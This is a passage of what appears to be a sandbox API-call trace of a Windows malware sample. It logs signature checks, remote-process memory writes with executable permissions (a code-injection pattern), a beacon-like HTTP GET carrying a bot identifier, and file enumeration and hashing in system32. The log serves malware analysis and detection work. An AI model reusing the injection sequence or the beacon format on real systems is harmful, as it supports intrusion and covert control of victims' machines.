hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32803c00, pdwDataLen=0xcdfac | out: pbData=0x32803c00, pdwDataLen=0xcdfac) returned 1 [0186.838] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0186.838] CryptDestroyKey (hKey=0x3396f040) returned 0 [0186.838] GetVersion () returned 0x295a000a [0186.838] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xcdf18, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0xcdf18) returned 0x0 [0186.838] BCryptImportKeyPair (in: hAlgorithm=0x3380efd0, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0xcdf10, pbInput=0x32e40d90, cbInput=0x68, dwFlags=0x0 | out: phKey=0xcdf10) returned 0x0 [0186.838] BCryptGetProperty (in: hObject=0x337b1f10, pszProperty="SignatureLength", pbOutput=0xcdf0c, cbOutput=0x4, pcbResult=0xcdf2c, dwFlags=0x0 | out: pbOutput=0xcdf0c, pcbResult=0xcdf2c) returned 0x0 [0186.838] BCryptVerifySignature (hKey=0x337b1f10, pPaddingInfo=0x0, pbHash=0x32e650f0, cbHash=0x30, pbSignature=0x32803e0c, cbSignature=0x60, dwFlags=0x0) returned 0x0 [0186.839] BCryptDestroyKey (in: hKey=0x337b1f10 | out: hKey=0x337b1f10) returned 0x0 [0186.839] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x3380efd0, dwFlags=0x0 | out: hAlgorithm=0x3380efd0) returned 0x0 [0186.839] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0186.839] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32a44310 [0186.839] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803c00 | out: hHeap=0x2150000) returned 1 [0186.839] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87a20 | out: hHeap=0x2150000) returned 1 [0186.840] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e86490 | out: hHeap=0x2150000) returned 1 [0186.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dpost", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0186.840] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e81050 [0186.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dpost", cchWideChar=-1, lpMultiByteStr=0x32e81050, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dpost", lpUsedDefaultChar=0x0) returned 6 [0186.840] lstrlenA (lpString="dpost") returned 5 [0186.840] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0186.840] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e81050*, nSize=0x6, lpNumberOfBytesWritten=0xcda58 | out: lpBuffer=0x32e81050*, lpNumberOfBytesWritten=0xcda58*=0x6) returned 1 [0186.841] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x204, flAllocationType=0x3000, flProtect=0x40) returned 0x4c0000 [0186.841] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x4c0000, lpBuffer=0x32a44310*, nSize=0x204, lpNumberOfBytesWritten=0xcda58 | out: lpBuffer=0x32a44310*, lpNumberOfBytesWritten=0xcda58*=0x204) returned 1 [0186.846] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x4d0000 [0186.846] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x4d0000, lpBuffer=0xcdcd0*, nSize=0x400, lpNumberOfBytesWritten=0xcda58 | out: lpBuffer=0xcdcd0*, lpNumberOfBytesWritten=0xcda58*=0x400) returned 1 [0186.847] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x4e0000 [0186.847] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x4e0000, lpBuffer=0xcdc50*, nSize=0x80, lpNumberOfBytesWritten=0xcda58 | out: lpBuffer=0xcdc50*, lpNumberOfBytesWritten=0xcda58*=0x80) returned 1 [0186.847] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x4f0000 [0186.848] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd9b0, nSize=0xd8, lpNumberOfBytesRead=0xcd968 | out: lpBuffer=0xcd9b0*, lpNumberOfBytesRead=0xcd968*=0xd8) returned 1 [0186.848] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x60) returned 0x32e72340 [0186.848] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x40) returned 0x500000 [0186.848] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x500000, lpBuffer=0x32e72340*, nSize=0x58, lpNumberOfBytesWritten=0xcd968 | out: lpBuffer=0x32e72340*, lpNumberOfBytesWritten=0xcd968*=0x58) returned 1 [0186.849] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd9b0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd968 | out: lpBuffer=0xcd9b0*, lpNumberOfBytesWritten=0xcd968*=0xd8) returned 1 [0186.850] ResetEvent (hEvent=0x794) returned 1 [0186.850] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0186.889] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd9b0, nSize=0xd8, lpNumberOfBytesRead=0xcd968 | out: lpBuffer=0xcd9b0*, lpNumberOfBytesRead=0xcd968*=0xd8) returned 1 [0186.889] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.889] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e72340 | out: hHeap=0x2150000) returned 1 [0186.889] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x4e0000, lpBuffer=0xcdc50, nSize=0x80, lpNumberOfBytesRead=0xcdab8 | out: lpBuffer=0xcdc50*, lpNumberOfBytesRead=0xcdab8*=0x80) returned 1 [0186.889] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x4d0000, lpBuffer=0xcdcd0, nSize=0x400, lpNumberOfBytesRead=0xcdab8 | out: lpBuffer=0xcdcd0*, lpNumberOfBytesRead=0xcdab8*=0x400) returned 1 [0186.890] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x4f0008, lpBuffer=0xcdb80, nSize=0x4, lpNumberOfBytesRead=0xcdab8 | out: lpBuffer=0xcdb80*, lpNumberOfBytesRead=0xcdab8*=0x4) returned 1 [0186.890] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x4f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.890] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x4e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.893] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x4c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.893] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.893] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44310 | out: hHeap=0x2150000) returned 1 [0186.893] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x4b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.893] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.894] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49f40 | out: hHeap=0x2150000) returned 1 [0186.894] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80cb0 [0186.894] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e80 | out: hHeap=0x2150000) returned 1 [0186.894] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80f90 [0186.894] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e00 | out: hHeap=0x2150000) returned 1 [0186.894] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b9f0 | out: hHeap=0x2150000) returned 1 [0186.894] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b7d0 | out: hHeap=0x2150000) returned 1 [0186.894] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80c50 | out: hHeap=0x2150000) returned 1 [0186.894] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bad0 | out: hHeap=0x2150000) returned 1 [0186.894] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.894] GetTickCount () returned 0xec19b1 [0186.895] GetTickCount () returned 0xec19b1 [0186.895] WinHttpCloseHandle (hInternet=0x7b42c0) returned 1 [0186.895] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/10/62/HDLBFZFXPDDFJFT/1/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396e250 [0186.895] WinHttpSetOption (hInternet=0x3396e250, dwOption=0x1f, lpBuffer=0xce038, dwBufferLength=0x4) returned 1 [0186.895] WinHttpSendRequest (hRequest=0x3396e250, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0187.403] WinHttpReceiveResponse (hRequest=0x3396e250, lpReserved=0x0) returned 1 [0187.403] WinHttpQueryHeaders (in: hRequest=0x3396e250, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xce034, lpdwBufferLength=0xce03c, lpdwIndex=0x0 | out: lpBuffer=0xce034*, lpdwBufferLength=0xce03c*=0x4, lpdwIndex=0x0) returned 1 [0187.404] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f690 | out: hHeap=0x2150000) returned 1 [0187.404] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f4b0 | out: hHeap=0x2150000) returned 1 [0187.404] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcea98 | out: lpSystemTimeAsFileTime=0xcea98*(dwLowDateTime=0xfc3719ee, dwHighDateTime=0x1d7b3c9)) [0187.404] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcea88 | out: lpSystemTimeAsFileTime=0xcea88*(dwLowDateTime=0xfc3719ee, dwHighDateTime=0x1d7b3c9)) [0187.404] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcea98 | out: lpSystemTimeAsFileTime=0xcea98*(dwLowDateTime=0xfc3719ee, dwHighDateTime=0x1d7b3c9)) [0187.404] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcea88 | out: lpSystemTimeAsFileTime=0xcea88*(dwLowDateTime=0xfc3719ee, dwHighDateTime=0x1d7b3c9)) [0187.404] GetFullPathNameW (in: lpFileName="EN\\", nBufferLength=0x105, lpBuffer=0xce710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\", lpFilePart=0x0) returned 0x17 [0187.404] PathAddBackslashW (in: pszPath="C:\\Windows\\system32\\EN\\" | out: pszPath="C:\\Windows\\system32\\EN\\") returned="" [0187.406] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\EN\\*.*", lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbda8689b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbdaacae9, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbdaacae9, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33886ba0 [0187.407] FindNextFileW (in: hFindFile=0x33886ba0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbda8689b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbdaacae9, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbdaacae9, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.407] FindNextFileW (in: hFindFile=0x33886ba0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f3b0c4a, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f3b0c4a, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f3b0c4a, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2fb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWSnapIn.Resources.dll", cAlternateFileName="")) returned 1 [0187.407] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80d90 [0187.407] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e4ffd0 [0187.407] FindNextFileW (in: hFindFile=0x33886ba0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f38a9f5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f38a9f5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f38a9f5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0xdc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWWizFwk.Resources.dll", cAlternateFileName="")) returned 1 [0187.407] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e80d90, Size=0x10) returned 0x32e81130 [0187.407] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32803c00 [0187.407] FindNextFileW (in: hFindFile=0x33886ba0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a1229a8, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9a1229a8, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9a1229a8, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutoWorkplace.Resources.dll", cAlternateFileName="")) returned 1 [0187.407] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e81130, Size=0x20) returned 0x32e88020 [0187.407] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32a44310 [0187.407] FindNextFileW (in: hFindFile=0x33886ba0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c3db3ca, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9c3db3ca, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9c3db3ca, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fhuxpresentation.Resources.dll", cAlternateFileName="")) returned 1 [0187.407] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e88020, Size=0x20) returned 0x32e87ab0 [0187.407] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e65a90 [0187.407] FindNextFileW (in: hFindFile=0x33886ba0, lpFindFileData=0xce928 | out: lpFindFileData=0xce928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c3db3ca, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9c3db3ca, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9c3db3ca, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fhuxpresentation.Resources.dll", cAlternateFileName="")) returned 0 [0187.407] GetLastError () returned 0x12 [0187.407] FindClose (in: hFindFile=0x33886ba0 | out: hFindFile=0x33886ba0) returned 1 [0187.407] PathFindFileNameW (pszPath="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll") returned="AuthFWSnapIn.Resources.dll" [0187.407] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x3204e010 [0187.407] GetFullPathNameW (in: lpFileName="EN\\AuthFWSnapIn.Resources.dll", nBufferLength=0x105, lpBuffer=0x3204e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll", lpFilePart=0x0) returned 0x31 [0187.407] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll" (normalized: "c:\\windows\\system32\\en\\authfwsnapin.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x640 [0187.408] GetFileTime (in: hFile=0x640, lpCreationTime=0xceb38, lpLastAccessTime=0xceb30, lpLastWriteTime=0xceb28 | out: lpCreationTime=0xceb38*(dwLowDateTime=0x9f3b0c4a, dwHighDateTime=0x1d112f1), lpLastAccessTime=0xceb30*(dwLowDateTime=0x9f3b0c4a, dwHighDateTime=0x1d112f1), lpLastWriteTime=0xceb28*(dwLowDateTime=0x9f3b0c4a, dwHighDateTime=0x1d112f1)) returned 1 [0187.408] CloseHandle (hObject=0x640) returned 1 [0187.408] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xceb58 | out: lpSystemTimeAsFileTime=0xceb58*(dwLowDateTime=0xfc37b668, dwHighDateTime=0x1d7b3c9)) [0187.408] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x3204e230 [0187.408] GetFullPathNameW (in: lpFileName="EN\\AuthFWSnapIn.Resources.dll", nBufferLength=0x105, lpBuffer=0x3204e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll", lpFilePart=0x0) returned 0x31 [0187.408] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x140) returned 0x32e41940 [0187.408] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll" (normalized: "c:\\windows\\system32\\en\\authfwsnapin.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0187.408] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2fb600 [0187.408] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.408] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x2fb600) returned 0x33ab2040 [0187.416] ReadFile (in: hFile=0x640, lpBuffer=0x33ab2040, nNumberOfBytesToRead=0x2fb600, lpNumberOfBytesRead=0xce6a4, lpOverlapped=0x0 | out: lpBuffer=0x33ab2040*, lpNumberOfBytesRead=0xce6a4*=0x2fb600, lpOverlapped=0x0) returned 1 [0187.568] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32348160 [0187.568] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0187.569] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.569] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0x20, dwFlags=0x0) returned 1 [0187.569] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.569] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c60 [0187.569] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32e87c60, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87c60, pdwDataLen=0xce51c) returned 1 [0187.569] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.569] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0187.569] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.569] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.569] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x40, dwFlags=0x0) returned 1 [0187.570] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.570] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87990 [0187.570] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e87990, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87990, pdwDataLen=0xce51c) returned 1 [0187.570] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.570] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.570] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0187.570] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.570] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x60, dwFlags=0x0) returned 1 [0187.570] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.570] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88080 [0187.570] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e88080, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88080, pdwDataLen=0xce51c) returned 1 [0187.570] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.570] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0187.570] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.571] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.571] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x80, dwFlags=0x0) returned 1 [0187.571] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.571] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87e70 [0187.571] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e87e70, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e87e70, pdwDataLen=0xce51c) returned 1 [0187.571] CryptDestroyHash (hHash=0x3396f200) returned 1 [0187.571] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.571] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0187.571] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.571] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0187.572] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.572] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88230 [0187.572] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e88230, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88230, pdwDataLen=0xce51c) returned 1 [0187.572] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0187.572] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0187.572] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0187.572] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.572] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0187.572] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.572] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e879c0 [0187.572] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x2, pbData=0x32e879c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e879c0, pdwDataLen=0xce51c) returned 1 [0187.572] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.572] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0187.572] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0187.573] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.573] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0187.573] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.573] RtlAllocateHeap (HeapHandle=0x2150000, 